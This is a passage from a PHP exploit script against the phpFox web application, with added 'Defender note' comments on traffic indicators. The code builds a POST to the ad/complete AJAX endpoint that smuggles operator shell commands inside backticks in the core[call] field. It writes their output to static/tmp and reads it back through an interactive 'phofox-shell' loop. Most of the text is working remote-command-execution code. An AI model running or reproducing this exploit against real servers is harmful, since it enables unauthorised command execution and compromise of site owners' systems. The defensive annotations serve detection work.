\n";
    // Tail of a usage message. The statement closed by the `\n";` above and the
    // opening of this block lie before the visible part of the file.
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /phpfox/\n";
    die();
}

// Host name and base path are taken from the first two command-line arguments.
list($host, $path) = array($argv[1], $argv[2]);

// Request 1 (read-back): a plain HTTP/1.0 GET for "<path>static/tmp".
// Defender note: a GET for static/tmp directly after the POST below is the
// second half of the traffic pattern this script produces.
$r_pack = "GET {$path}static/tmp HTTP/1.0\r\n";
$r_pack .= "Host: {$host}\r\n";
$r_pack .= "Connection: close\r\n\r\n";

// Request 2 (trigger): a POST template aimed at static/ajax.php?do=/ad/complete/.
// "%d" and "%s" are sprintf() placeholders for the body length and the body.
// Defender note: the header is written literally as "X_REQUESTED_WITH" (with
// underscores) and the request line uses HTTP/1.0; both are visible in this
// template and may help distinguish this script's traffic in access logs or WAF data.
$packet = "POST {$path}static/ajax.php?do=/ad/complete/ HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: %d\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "X_REQUESTED_WITH: XMLHttpRequest\r\n";
$packet .= "Connection: close\r\n\r\n%s";

// Interactive loop: one line is read from STDIN per iteration until "exit".
while(1)
{
    print "\nphofox-shell# ";
    // The literal input "exit" ends the loop.
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    // Input containing "." or ")" is refused before anything is sent. The reason
    // is not stated here; presumably those characters would break the expression
    // built below (TODO confirm).
    else if (preg_match('/\./', $cmd)) print "\nDots not allowed!\n";
    else if (preg_match('/\)/', $cmd)) print "\nParenthesis not allowed!\n";
    else
    {
        // The form field core[call] carries the operator's input inside a
        // backtick expression, with output redirected to a file named "tmp".
        // NOTE(review): this only works if the server evaluates the value of
        // core[call] as code; the vulnerable server-side code is not shown here.
        // Defender note: a request body with core[call] containing backticks or
        // ".(" sent to the ad/complete AJAX endpoint is the primary indicator.
        // A file named "tmp" appearing in the static/ directory is a likely
        // host artifact (inferred from the read-back GET).
        $payload = "core[call]=.(`{$cmd}>tmp`).";
        // http_send() is defined outside the visible part of the file. Its
        // return value is ignored for the POST and used for the GET.
        http_send($host, sprintf($packet, strlen($payload), $payload));
        $output = http_send($host, $r_pack);
        // Success check: the response must not contain "404 not"
        // (case-insensitive) and must have content after the blank line that
        // ends the headers. That content is printed; otherwise the script exits.
        !preg_match('/404 not/i', $output) && preg_match('/\n\r\n(.*)/s', $output, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
    }
}